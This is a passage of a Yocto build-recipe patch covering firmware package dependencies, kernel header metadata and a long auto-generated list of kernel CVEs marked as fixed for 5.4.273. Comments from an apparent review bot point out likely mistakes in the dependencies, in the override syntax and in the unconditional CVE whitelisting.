RDEPENDS_${PN}-qcom-sdm845-compute = "${PN}-qcom-license"
RDEPENDS_${PN}-qcom-sdm845-modem = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-sm8250-audio = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-sm8250-compute = "${PN}-qcom-license"
+
+RRECOMMENDS_${PN}-qcom-sc8280xp-lenovo-x13s-audio = "${PN}-qcom-sc8280xp-lenovo-x13s-compat"
+RRECOMMENDS_${PN}-qcom-sc8280xp-lenovo-x13s-adreno = "${PN}-qcom-sc8280xp-lenovo-x13s-compat"
+RRECOMMENDS_${PN}-qcom-sc8280xp-lenovo-x13s-compute = "${PN}-qcom-sc8280xp-lenovo-x13s-compat"
+RRECOMMENDS_${PN}-qcom-sc8280xp-lenovo-x13s-sensors = "${PN}-qcom-sc8280xp-lenovo-x13s-compat"
FILES_${PN}-liquidio = "${nonarch_base_libdir}/firmware/liquidio"
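Review bot: The RDEPENDS block drops the license dependency for `${PN}-qcom-adreno-a3xx`: the old `RDEPENDS_${PN}-qcom-adreno-a3xx` line is removed and replaced by two assignments to `RDEPENDS_${PN}-qcom-adreno-a2xx`, the second overriding the first. This looks like a typo; the first should probably read `RDEPENDS_${PN}-qcom-adreno-a3xx = "${PN}-qcom-license"`, otherwise the a3xx firmware package can be installed without the package that carries `LICENSE.qcom`. The new `-qcom-apq8096-adreno`, `-qcom-sdm845-adreno` and `-qcom-sm8250-adreno` packages get LICENSE and FILES entries but no RDEPENDS on `${PN}-qcom-license` either, and `-qcom-sc8280xp-lenovo-x13s-compat` has a FILES entry but no LICENSE line. Whether these packages are listed in PACKAGES is outside this hunk.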
@@ -942,7 +1096,6 @@ LICENSE_${PN} = "\
& Firmware-fw_sst_0f28 \
& Firmware-go7007 \
& Firmware-hfi1_firmware \
- & Firmware-i2400m \
& Firmware-ibt_firmware \
& Firmware-it913x \
& Firmware-IntcSST2 \
@@ -963,7 +1116,6 @@ LICENSE_${PN} = "\
& Firmware-ralink-firmware \
& Firmware-imx-sdma_firmware \
& Firmware-siano \
- & Firmware-tda7706-firmware \
& Firmware-ti-connectivity \
& Firmware-ti-keystone \
& Firmware-ueagle-atm4-firmware \
@@ -996,3 +1148,6 @@ python populate_packages_prepend () {
# Firmware files are generally not ran on the CPU, so they can be
# allarch despite being architecture specific
INSANE_SKIP = "arch"
+
+# Don't warn about already stripped files
+INSANE_SKIP:${PN} = "already-stripped"
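Review bot: The added `INSANE_SKIP:${PN}` line uses the colon override syntax, while the other per-package assignments visible in this recipe use the underscore form (`FILES_${PN}-…`, `RDEPENDS_${PN}-…`). If the bitbake on this branch does not treat `:` as an override separator, the value lands on an unrelated variable name and the `already-stripped` QA check still fires. Writing `INSANE_SKIP_${PN} = "already-stripped"` would match the rest of the file. The comment could also say which firmware files arrive pre-stripped, so the skip can be narrowed or dropped later.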
diff --git a/meta/recipes-kernel/linux-libc-headers/linux-libc-headers.inc b/meta/recipes-kernel/linux-libc-headers/linux-libc-headers.inc
index 4ad74a27e9..2d4429b6b4 100644
--- a/meta/recipes-kernel/linux-libc-headers/linux-libc-headers.inc
+++ b/meta/recipes-kernel/linux-libc-headers/linux-libc-headers.inc
@@ -1,4 +1,6 @@
SUMMARY = "Sanitized set of kernel headers for the C library's use"
+HOMEPAGE = "https://www.kernel.org/"
+DESCRIPTION = "Designed to maintain an Application Programming Interface (API) stable version of the Linux headers"
SECTION = "devel"
LICENSE = "GPLv2"
diff --git a/meta/recipes-kernel/linux/cve-exclusion.inc b/meta/recipes-kernel/linux/cve-exclusion.inc
new file mode 100644
index 0000000000..efc8b09475
--- /dev/null
+++ b/meta/recipes-kernel/linux/cve-exclusion.inc
@@ -0,0 +1,13 @@
+# Kernel CVE exclusion file
+
+# https://nvd.nist.gov/vuln/detail/CVE-2020-29373
+# Patched in kernel since v5.6 ff002b30181d30cdfbca316dadd099c3ca0d739c
+# Backported in version v5.4.24 cac68d12c531aa3010509a5a55a5dfd18dedaa80
+CVE_CHECK_WHITELIST += "CVE-2020-29373"
+
+# https://nvd.nist.gov/vuln/detail/CVE-2022-39188
+# Patched in kernel since v5.19 b67fbebd4cf980aecbcc750e1462128bffe8ae15
+# Backported in version v5.4.212 c9c5501e815132530d741ec9fdd22657f91656bc
+# Backported in version v5.10.141 895428ee124ad70b9763259308354877b725c31d
+# Backported in version v5.15.65 3ffb97fce282df03723995f5eed6a559d008078e
+CVE_CHECK_WHITELIST += "CVE-2022-39188"
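Review bot: Both `CVE_CHECK_WHITELIST` entries are unconditional, yet the comments say the fixes exist only from specific stable releases (v5.4.24 for CVE-2020-29373; v5.4.212, v5.10.141 and v5.15.65 for CVE-2022-39188). A kernel recipe that includes this file at an older point release would have the CVE hidden from the cve-check report while still being affected; which recipes include the file is not visible here. Consider stating the minimum version next to each entry, for example `# Only valid for LINUX_VERSION >= 5.4.212 on the 5.4 series`. Alternatively, guard the file with a version check like the `check_kernel_cve_status_version` prefunc in `cve-exclusion_5.4.inc`.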
diff --git a/meta/recipes-kernel/linux/cve-exclusion_5.4.inc b/meta/recipes-kernel/linux/cve-exclusion_5.4.inc
new file mode 100644
index 0000000000..b0b33bcc1d
--- /dev/null
+++ b/meta/recipes-kernel/linux/cve-exclusion_5.4.inc
@@ -0,0 +1,9445 @@
+
+# Auto-generated CVE metadata, DO NOT EDIT BY HAND.
+# Generated at 2024-04-14 04:45:05.585211 for version 5.4.273
+
+python check_kernel_cve_status_version() {
+ this_version = "5.4.273"
+ kernel_version = d.getVar("LINUX_VERSION")
+ if kernel_version != this_version:
+ bb.warn("Kernel CVE status needs updating: generated for %s but kernel is %s" % (this_version, kernel_version))
+}
+do_cve_check[prefuncs] += "check_kernel_cve_status_version"
+
+# fixed-version: Fixed after version 2.6.12rc2
+CVE_CHECK_WHITELIST += "CVE-2003-1604"
+
+# fixed-version: Fixed after version 3.6rc1
+CVE_CHECK_WHITELIST += "CVE-2004-0230"
+
+# CVE-2005-3660 has no known resolution
+
+# fixed-version: Fixed after version 2.6.26rc5
+CVE_CHECK_WHITELIST += "CVE-2006-3635"
+
+# fixed-version: Fixed after version 2.6.19rc3
+CVE_CHECK_WHITELIST += "CVE-2006-5331"
+
+# fixed-version: Fixed after version 2.6.19rc2
+CVE_CHECK_WHITELIST += "CVE-2006-6128"
+
+# CVE-2007-3719 has no known resolution
+
+# fixed-version: Fixed after version 2.6.12rc2
+CVE_CHECK_WHITELIST += "CVE-2007-4774"
+
+# fixed-version: Fixed after version 2.6.24rc6
+CVE_CHECK_WHITELIST += "CVE-2007-6761"
+
+# fixed-version: Fixed after version 2.6.20rc5
+CVE_CHECK_WHITELIST += "CVE-2007-6762"
+
+# CVE-2008-2544 has no known resolution
+
+# CVE-2008-4609 has no known resolution
+
+# fixed-version: Fixed after version 2.6.25rc1
+CVE_CHECK_WHITELIST += "CVE-2008-7316"
+
+# fixed-version: Fixed after version 2.6.31rc6
+CVE_CHECK_WHITELIST += "CVE-2009-2692"
+
+# fixed-version: Fixed after version 2.6.23rc9
+CVE_CHECK_WHITELIST += "CVE-2010-0008"
+
+# fixed-version: Fixed after version 2.6.36rc5
+CVE_CHECK_WHITELIST += "CVE-2010-3432"
+
+# CVE-2010-4563 has no known resolution
+
+# fixed-version: Fixed after version 2.6.37rc6
+CVE_CHECK_WHITELIST += "CVE-2010-4648"
+
+# fixed-version: Fixed after version 2.6.38rc1
+CVE_CHECK_WHITELIST += "CVE-2010-5313"
+
+# CVE-2010-5321 has no known resolution
+
+# fixed-version: Fixed after version 2.6.35rc1
+CVE_CHECK_WHITELIST += "CVE-2010-5328"
+
+# fixed-version: Fixed after version 2.6.39rc1
+CVE_CHECK_WHITELIST += "CVE-2010-5329"
+
+# fixed-version: Fixed after version 2.6.34rc7
+CVE_CHECK_WHITELIST += "CVE-2010-5331"
+
+# fixed-version: Fixed after version 2.6.37rc1
+CVE_CHECK_WHITELIST += "CVE-2010-5332"
+
+# fixed-version: Fixed after version 3.2rc1
+CVE_CHECK_WHITELIST += "CVE-2011-4098"
+
+# fixed-version: Fixed after version 3.3rc1
+CVE_CHECK_WHITELIST += "CVE-2011-4131"
+
+# fixed-version: Fixed after version 3.2rc1
+CVE_CHECK_WHITELIST += "CVE-2011-4915"
+
+# CVE-2011-4916 has no known resolution
+
+# CVE-2011-4917 has no known resolution
+
+# fixed-version: Fixed after version 3.2rc1
+CVE_CHECK_WHITELIST += "CVE-2011-5321"
+
+# fixed-version: Fixed after version 3.1rc1
+CVE_CHECK_WHITELIST += "CVE-2011-5327"
+
+# fixed-version: Fixed after version 3.7rc2
+CVE_CHECK_WHITELIST += "CVE-2012-0957"
+
+# fixed-version: Fixed after version 3.5rc1
+CVE_CHECK_WHITELIST += "CVE-2012-2119"
+
+# fixed-version: Fixed after version 3.5rc1
+CVE_CHECK_WHITELIST += "CVE-2012-2136"
+
+# fixed-version: Fixed after version 3.5rc2
+CVE_CHECK_WHITELIST += "CVE-2012-2137"
+
+# fixed-version: Fixed after version 3.4rc6
+CVE_CHECK_WHITELIST += "CVE-2012-2313"
+
+# fixed-version: Fixed after version 3.4rc6
+CVE_CHECK_WHITELIST += "CVE-2012-2319"
+
+# fixed-version: Fixed after version 3.13rc4
+CVE_CHECK_WHITELIST += "CVE-2012-2372"
+
+# fixed-version: Fixed after version 3.4rc1
+CVE_CHECK_WHITELIST += "CVE-2012-2375"
+
+# fixed-version: Fixed after version 3.5rc1
+CVE_CHECK_WHITELIST += "CVE-2012-2390"
+
+# fixed-version: Fixed after version 3.5rc4
+CVE_CHECK_WHITELIST += "CVE-2012-2669"
+
+# fixed-version: Fixed after version 2.6.34rc1
+CVE_CHECK_WHITELIST += "CVE-2012-2744"
+
+# fixed-version: Fixed after version 3.4rc3
+CVE_CHECK_WHITELIST += "CVE-2012-2745"
+
+# fixed-version: Fixed after version 3.5rc6
+CVE_CHECK_WHITELIST += "CVE-2012-3364"
+
+# fixed-version: Fixed after version 3.4rc5
+CVE_CHECK_WHITELIST += "CVE-2012-3375"
+
+# fixed-version: Fixed after version 3.5rc5
+CVE_CHECK_WHITELIST += "CVE-2012-3400"
+
+# fixed-version: Fixed after version 3.6rc2
+CVE_CHECK_WHITELIST += "CVE-2012-3412"
+
+# fixed-version: Fixed after version 3.6rc1
+CVE_CHECK_WHITELIST += "CVE-2012-3430"
+
+# fixed-version: Fixed after version 2.6.19rc4
+CVE_CHECK_WHITELIST += "CVE-2012-3510"
+
+# fixed-version: Fixed after version 3.5rc6
+CVE_CHECK_WHITELIST += "CVE-2012-3511"
+
+# fixed-version: Fixed after version 3.6rc3
+CVE_CHECK_WHITELIST += "CVE-2012-3520"
+
+# fixed-version: Fixed after version 3.0rc1
+CVE_CHECK_WHITELIST += "CVE-2012-3552"
+
+# Skipping CVE-2012-4220, no affected_versions
+
+# Skipping CVE-2012-4221, no affected_versions
+
+# Skipping CVE-2012-4222, no affected_versions
+
+# fixed-version: Fixed after version 3.4rc1
+CVE_CHECK_WHITELIST += "CVE-2012-4398"
+
+# fixed-version: Fixed after version 2.6.36rc4
+CVE_CHECK_WHITELIST += "CVE-2012-4444"
+
+# fixed-version: Fixed after version 3.7rc6
+CVE_CHECK_WHITELIST += "CVE-2012-4461"
+
+# fixed-version: Fixed after version 3.6rc5
+CVE_CHECK_WHITELIST += "CVE-2012-4467"
+
+# fixed-version: Fixed after version 3.7rc3
+CVE_CHECK_WHITELIST += "CVE-2012-4508"
+
+# fixed-version: Fixed after version 3.8rc1
+CVE_CHECK_WHITELIST += "CVE-2012-4530"
+
+# CVE-2012-4542 has no known resolution
+
+# fixed-version: Fixed after version 3.7rc4
+CVE_CHECK_WHITELIST += "CVE-2012-4565"
+
+# fixed-version: Fixed after version 3.8rc1
+CVE_CHECK_WHITELIST += "CVE-2012-5374"
+
+# fixed-version: Fixed after version 3.8rc1
+CVE_CHECK_WHITELIST += "CVE-2012-5375"
+
+# fixed-version: Fixed after version 3.6rc1
+CVE_CHECK_WHITELIST += "CVE-2012-5517"
+
+# fixed-version: Fixed after version 3.6rc7
+CVE_CHECK_WHITELIST += "CVE-2012-6536"
+
+# fixed-version: Fixed after version 3.6rc7
+CVE_CHECK_WHITELIST += "CVE-2012-6537"
+
+# fixed-version: Fixed after version 3.6rc7
+CVE_CHECK_WHITELIST += "CVE-2012-6538"
+
+# fixed-version: Fixed after version 3.6rc3
+CVE_CHECK_WHITELIST += "CVE-2012-6539"
+
+# fixed-version: Fixed after version 3.6rc3
+CVE_CHECK_WHITELIST += "CVE-2012-6540"
+
+# fixed-version: Fixed after version 3.6rc3
+CVE_CHECK_WHITELIST += "CVE-2012-6541"
+
+# fixed-version: Fixed after version 3.6rc3
+CVE_CHECK_WHITELIST += "CVE-2012-6542"
+
+# fixed-version: Fixed after version 3.6rc3
+CVE_CHECK_WHITELIST += "CVE-2012-6543"
+
+# fixed-version: Fixed after version 3.6rc3
+CVE_CHECK_WHITELIST += "CVE-2012-6544"
+
+# fixed-version: Fixed after version 3.6rc3
+CVE_CHECK_WHITELIST += "CVE-2012-6545"
+
+# fixed-version: Fixed after version 3.6rc3
+CVE_CHECK_WHITELIST += "CVE-2012-6546"
+
+# fixed-version: Fixed after version 3.6rc1
+CVE_CHECK_WHITELIST += "CVE-2012-6547"
+
+# fixed-version: Fixed after version 3.6rc1
+CVE_CHECK_WHITELIST += "CVE-2012-6548"
+
+# fixed-version: Fixed after version 3.6rc1
+CVE_CHECK_WHITELIST += "CVE-2012-6549"
+
+# fixed-version: Fixed after version 3.3rc1
+CVE_CHECK_WHITELIST += "CVE-2012-6638"
+
+# fixed-version: Fixed after version 3.6rc2
+CVE_CHECK_WHITELIST += "CVE-2012-6647"
+
+# fixed-version: Fixed after version 3.6
+CVE_CHECK_WHITELIST += "CVE-2012-6657"
+
+# fixed-version: Fixed after version 3.6rc5
+CVE_CHECK_WHITELIST += "CVE-2012-6689"
+
+# fixed-version: Fixed after version 3.5rc1
+CVE_CHECK_WHITELIST += "CVE-2012-6701"
+
+# fixed-version: Fixed after version 3.7rc1
+CVE_CHECK_WHITELIST += "CVE-2012-6703"
+
+# fixed-version: Fixed after version 3.5rc1
+CVE_CHECK_WHITELIST += "CVE-2012-6704"
+
+# fixed-version: Fixed after version 3.4rc1
+CVE_CHECK_WHITELIST += "CVE-2012-6712"
+
+# fixed-version: Fixed after version 3.9rc1
+CVE_CHECK_WHITELIST += "CVE-2013-0160"
+
+# fixed-version: Fixed after version 3.8rc5
+CVE_CHECK_WHITELIST += "CVE-2013-0190"
+
+# fixed-version: Fixed after version 3.8rc7
+CVE_CHECK_WHITELIST += "CVE-2013-0216"
+
+# fixed-version: Fixed after version 3.8rc7
+CVE_CHECK_WHITELIST += "CVE-2013-0217"
+
+# fixed-version: Fixed after version 3.8
+CVE_CHECK_WHITELIST += "CVE-2013-0228"
+
+# fixed-version: Fixed after version 3.8rc7
+CVE_CHECK_WHITELIST += "CVE-2013-0231"
+
+# fixed-version: Fixed after version 3.8rc6
+CVE_CHECK_WHITELIST += "CVE-2013-0268"
+
+# fixed-version: Fixed after version 3.8
+CVE_CHECK_WHITELIST += "CVE-2013-0290"
+
+# fixed-version: Fixed after version 3.7rc1
+CVE_CHECK_WHITELIST += "CVE-2013-0309"
+
+# fixed-version: Fixed after version 3.5
+CVE_CHECK_WHITELIST += "CVE-2013-0310"
+
+# fixed-version: Fixed after version 3.7rc8
+CVE_CHECK_WHITELIST += "CVE-2013-0311"
+
+# fixed-version: Fixed after version 3.8rc5
+CVE_CHECK_WHITELIST += "CVE-2013-0313"
+
+# fixed-version: Fixed after version 3.11rc7
+CVE_CHECK_WHITELIST += "CVE-2013-0343"
+
+# fixed-version: Fixed after version 3.8rc6
+CVE_CHECK_WHITELIST += "CVE-2013-0349"
+
+# fixed-version: Fixed after version 3.8rc5
+CVE_CHECK_WHITELIST += "CVE-2013-0871"
+
+# fixed-version: Fixed after version 3.9rc4
+CVE_CHECK_WHITELIST += "CVE-2013-0913"
+
+# fixed-version: Fixed after version 3.9rc3
+CVE_CHECK_WHITELIST += "CVE-2013-0914"
+
+# fixed-version: Fixed after version 3.11rc1
+CVE_CHECK_WHITELIST += "CVE-2013-1059"
+
+# fixed-version: Fixed after version 3.9rc1
+CVE_CHECK_WHITELIST += "CVE-2013-1763"
+
+# fixed-version: Fixed after version 3.9rc1
+CVE_CHECK_WHITELIST += "CVE-2013-1767"
+
+# fixed-version: Fixed after version 3.5rc1
+CVE_CHECK_WHITELIST += "CVE-2013-1772"
+
+# fixed-version: Fixed after version 3.3rc1
+CVE_CHECK_WHITELIST += "CVE-2013-1773"
+
+# fixed-version: Fixed after version 3.8rc5
+CVE_CHECK_WHITELIST += "CVE-2013-1774"
+
+# fixed-version: Fixed after version 3.9rc3
+CVE_CHECK_WHITELIST += "CVE-2013-1792"
+
+# fixed-version: Fixed after version 3.9rc4
+CVE_CHECK_WHITELIST += "CVE-2013-1796"
+
+# fixed-version: Fixed after version 3.9rc4
+CVE_CHECK_WHITELIST += "CVE-2013-1797"
+
+# fixed-version: Fixed after version 3.9rc4
+CVE_CHECK_WHITELIST += "CVE-2013-1798"
+
+# fixed-version: Fixed after version 3.8rc6
+CVE_CHECK_WHITELIST += "CVE-2013-1819"
+
+# fixed-version: Fixed after version 3.6rc7
+CVE_CHECK_WHITELIST += "CVE-2013-1826"
+
+# fixed-version: Fixed after version 3.6rc3
+CVE_CHECK_WHITELIST += "CVE-2013-1827"
+
+# fixed-version: Fixed after version 3.9rc2
+CVE_CHECK_WHITELIST += "CVE-2013-1828"
+
+# fixed-version: Fixed after version 3.9rc3
+CVE_CHECK_WHITELIST += "CVE-2013-1848"
+
+# fixed-version: Fixed after version 3.9rc3
+CVE_CHECK_WHITELIST += "CVE-2013-1858"
+
+# fixed-version: Fixed after version 3.9rc3
+CVE_CHECK_WHITELIST += "CVE-2013-1860"
+
+# fixed-version: Fixed after version 3.7rc3
+CVE_CHECK_WHITELIST += "CVE-2013-1928"
+
+# fixed-version: Fixed after version 3.9rc6
+CVE_CHECK_WHITELIST += "CVE-2013-1929"
+
+# Skipping CVE-2013-1935, no affected_versions
+
+# fixed-version: Fixed after version 3.0rc1
+CVE_CHECK_WHITELIST += "CVE-2013-1943"
+
+# fixed-version: Fixed after version 3.9rc5
+CVE_CHECK_WHITELIST += "CVE-2013-1956"
+
+# fixed-version: Fixed after version 3.9rc5
+CVE_CHECK_WHITELIST += "CVE-2013-1957"
+
+# fixed-version: Fixed after version 3.9rc5
+CVE_CHECK_WHITELIST += "CVE-2013-1958"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-1959"
+
+# fixed-version: Fixed after version 3.9rc8
+CVE_CHECK_WHITELIST += "CVE-2013-1979"
+
+# fixed-version: Fixed after version 3.8rc2
+CVE_CHECK_WHITELIST += "CVE-2013-2015"
+
+# fixed-version: Fixed after version 2.6.34
+CVE_CHECK_WHITELIST += "CVE-2013-2017"
+
+# fixed-version: Fixed after version 3.8rc4
+CVE_CHECK_WHITELIST += "CVE-2013-2058"
+
+# fixed-version: Fixed after version 3.9rc8
+CVE_CHECK_WHITELIST += "CVE-2013-2094"
+
+# fixed-version: Fixed after version 2.6.34rc4
+CVE_CHECK_WHITELIST += "CVE-2013-2128"
+
+# fixed-version: Fixed after version 3.11rc3
+CVE_CHECK_WHITELIST += "CVE-2013-2140"
+
+# fixed-version: Fixed after version 3.9rc8
+CVE_CHECK_WHITELIST += "CVE-2013-2141"
+
+# fixed-version: Fixed after version 3.9rc8
+CVE_CHECK_WHITELIST += "CVE-2013-2146"
+
+# fixed-version: Fixed after version 3.12rc3
+CVE_CHECK_WHITELIST += "CVE-2013-2147"
+
+# fixed-version: Fixed after version 3.11rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2148"
+
+# fixed-version: Fixed after version 3.11rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2164"
+
+# Skipping CVE-2013-2188, no affected_versions
+
+# fixed-version: Fixed after version 3.9rc4
+CVE_CHECK_WHITELIST += "CVE-2013-2206"
+
+# Skipping CVE-2013-2224, no affected_versions
+
+# fixed-version: Fixed after version 3.10
+CVE_CHECK_WHITELIST += "CVE-2013-2232"
+
+# fixed-version: Fixed after version 3.10
+CVE_CHECK_WHITELIST += "CVE-2013-2234"
+
+# fixed-version: Fixed after version 3.9rc6
+CVE_CHECK_WHITELIST += "CVE-2013-2237"
+
+# Skipping CVE-2013-2239, no affected_versions
+
+# fixed-version: Fixed after version 3.9rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2546"
+
+# fixed-version: Fixed after version 3.9rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2547"
+
+# fixed-version: Fixed after version 3.9rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2548"
+
+# fixed-version: Fixed after version 3.9rc8
+CVE_CHECK_WHITELIST += "CVE-2013-2596"
+
+# fixed-version: Fixed after version 3.9rc3
+CVE_CHECK_WHITELIST += "CVE-2013-2634"
+
+# fixed-version: Fixed after version 3.9rc3
+CVE_CHECK_WHITELIST += "CVE-2013-2635"
+
+# fixed-version: Fixed after version 3.9rc3
+CVE_CHECK_WHITELIST += "CVE-2013-2636"
+
+# fixed-version: Fixed after version 3.10rc4
+CVE_CHECK_WHITELIST += "CVE-2013-2850"
+
+# fixed-version: Fixed after version 3.11rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2851"
+
+# fixed-version: Fixed after version 3.10rc6
+CVE_CHECK_WHITELIST += "CVE-2013-2852"
+
+# fixed-version: Fixed after version 3.12rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2888"
+
+# fixed-version: Fixed after version 3.12rc2
+CVE_CHECK_WHITELIST += "CVE-2013-2889"
+
+# fixed-version: Fixed after version 3.12rc2
+CVE_CHECK_WHITELIST += "CVE-2013-2890"
+
+# fixed-version: Fixed after version 3.12rc2
+CVE_CHECK_WHITELIST += "CVE-2013-2891"
+
+# fixed-version: Fixed after version 3.12rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2892"
+
+# fixed-version: Fixed after version 3.12rc2
+CVE_CHECK_WHITELIST += "CVE-2013-2893"
+
+# fixed-version: Fixed after version 3.12rc2
+CVE_CHECK_WHITELIST += "CVE-2013-2894"
+
+# fixed-version: Fixed after version 3.12rc2
+CVE_CHECK_WHITELIST += "CVE-2013-2895"
+
+# fixed-version: Fixed after version 3.12rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2896"
+
+# fixed-version: Fixed after version 3.12rc2
+CVE_CHECK_WHITELIST += "CVE-2013-2897"
+
+# fixed-version: Fixed after version 3.12rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2898"
+
+# fixed-version: Fixed after version 3.12rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2899"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2929"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2930"
+
+# fixed-version: Fixed after version 3.9
+CVE_CHECK_WHITELIST += "CVE-2013-3076"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3222"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3223"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3224"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3225"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3226"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3227"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3228"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3229"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3230"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3231"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3232"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3233"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3234"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3235"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3236"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3237"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3301"
+
+# fixed-version: Fixed after version 3.8rc3
+CVE_CHECK_WHITELIST += "CVE-2013-3302"
+
+# fixed-version: Fixed after version 3.11rc1
+CVE_CHECK_WHITELIST += "CVE-2013-4125"
+
+# fixed-version: Fixed after version 3.11rc1
+CVE_CHECK_WHITELIST += "CVE-2013-4127"
+
+# fixed-version: Fixed after version 3.11rc1
+CVE_CHECK_WHITELIST += "CVE-2013-4129"
+
+# fixed-version: Fixed after version 3.11rc1
+CVE_CHECK_WHITELIST += "CVE-2013-4162"
+
+# fixed-version: Fixed after version 3.11rc1
+CVE_CHECK_WHITELIST += "CVE-2013-4163"
+
+# fixed-version: Fixed after version 3.11rc5
+CVE_CHECK_WHITELIST += "CVE-2013-4205"
+
+# fixed-version: Fixed after version 3.10rc4
+CVE_CHECK_WHITELIST += "CVE-2013-4220"
+
+# fixed-version: Fixed after version 3.10rc5
+CVE_CHECK_WHITELIST += "CVE-2013-4247"
+
+# fixed-version: Fixed after version 3.11rc6
+CVE_CHECK_WHITELIST += "CVE-2013-4254"
+
+# fixed-version: Fixed after version 3.12rc4
+CVE_CHECK_WHITELIST += "CVE-2013-4270"
+
+# fixed-version: Fixed after version 3.12rc6
+CVE_CHECK_WHITELIST += "CVE-2013-4299"
+
+# fixed-version: Fixed after version 3.11
+CVE_CHECK_WHITELIST += "CVE-2013-4300"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2013-4312"
+
+# fixed-version: Fixed after version 3.12rc2
+CVE_CHECK_WHITELIST += "CVE-2013-4343"
+
+# fixed-version: Fixed after version 3.13rc2
+CVE_CHECK_WHITELIST += "CVE-2013-4345"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-4348"
+
+# fixed-version: Fixed after version 3.12rc2
+CVE_CHECK_WHITELIST += "CVE-2013-4350"
+
+# fixed-version: Fixed after version 3.12rc4
+CVE_CHECK_WHITELIST += "CVE-2013-4387"
+
+# fixed-version: Fixed after version 3.12rc7
+CVE_CHECK_WHITELIST += "CVE-2013-4470"
+
+# fixed-version: Fixed after version 3.10rc1
+CVE_CHECK_WHITELIST += "CVE-2013-4483"
+
+# fixed-version: Fixed after version 3.12
+CVE_CHECK_WHITELIST += "CVE-2013-4511"
+
+# fixed-version: Fixed after version 3.12
+CVE_CHECK_WHITELIST += "CVE-2013-4512"
+
+# fixed-version: Fixed after version 3.12
+CVE_CHECK_WHITELIST += "CVE-2013-4513"
+
+# fixed-version: Fixed after version 3.12
+CVE_CHECK_WHITELIST += "CVE-2013-4514"
+
+# fixed-version: Fixed after version 3.12
+CVE_CHECK_WHITELIST += "CVE-2013-4515"
+
+# fixed-version: Fixed after version 3.12
+CVE_CHECK_WHITELIST += "CVE-2013-4516"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-4563"
+
+# fixed-version: Fixed after version 3.13rc7
+CVE_CHECK_WHITELIST += "CVE-2013-4579"
+
+# fixed-version: Fixed after version 3.13rc4
+CVE_CHECK_WHITELIST += "CVE-2013-4587"
+
+# fixed-version: Fixed after version 2.6.33rc4
+CVE_CHECK_WHITELIST += "CVE-2013-4588"
+
+# fixed-version: Fixed after version 3.8rc1
+CVE_CHECK_WHITELIST += "CVE-2013-4591"
+
+# fixed-version: Fixed after version 3.7rc1
+CVE_CHECK_WHITELIST += "CVE-2013-4592"
+
+# Skipping CVE-2013-4737, no affected_versions
+
+# Skipping CVE-2013-4738, no affected_versions
+
+# Skipping CVE-2013-4739, no affected_versions
+
+# fixed-version: Fixed after version 3.10rc5
+CVE_CHECK_WHITELIST += "CVE-2013-5634"
+
+# fixed-version: Fixed after version 3.6rc6
+CVE_CHECK_WHITELIST += "CVE-2013-6282"
+
+# fixed-version: Fixed after version 3.13rc4
+CVE_CHECK_WHITELIST += "CVE-2013-6367"
+
+# fixed-version: Fixed after version 3.13rc4
+CVE_CHECK_WHITELIST += "CVE-2013-6368"
+
+# fixed-version: Fixed after version 3.13rc4
+CVE_CHECK_WHITELIST += "CVE-2013-6376"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-6378"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-6380"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-6381"
+
+# fixed-version: Fixed after version 3.13rc4
+CVE_CHECK_WHITELIST += "CVE-2013-6382"
+
+# fixed-version: Fixed after version 3.12
+CVE_CHECK_WHITELIST += "CVE-2013-6383"
+
+# Skipping CVE-2013-6392, no affected_versions
+
+# fixed-version: Fixed after version 3.12rc1
+CVE_CHECK_WHITELIST += "CVE-2013-6431"
+
+# fixed-version: Fixed after version 3.13rc1
